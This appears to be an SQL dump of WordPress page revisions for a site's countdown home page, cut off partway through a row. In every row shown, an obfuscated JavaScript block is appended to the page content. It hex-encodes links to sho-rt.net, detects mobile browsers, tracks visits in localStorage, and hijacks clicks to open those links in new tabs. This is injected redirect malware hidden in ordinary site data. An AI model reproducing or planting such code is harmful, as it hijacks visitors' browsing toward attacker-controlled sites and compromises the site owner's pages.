(3079,1,'2022-11-08 21:48:27','2022-11-08 21:48:27','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#8224e3\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:48:27','2022-11-08 21:48:27','',3066,'https://gsw2023.com/?p=3079',0,'revision','',0),
(3080,1,'2022-11-08 21:49:30','2022-11-08 21:49:30','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#8224e3\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:49:30','2022-11-08 21:49:30','',3066,'https://gsw2023.com/?p=3080',0,'revision','',0),
(3081,1,'2022-11-08 21:49:39','2022-11-08 21:49:39','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188)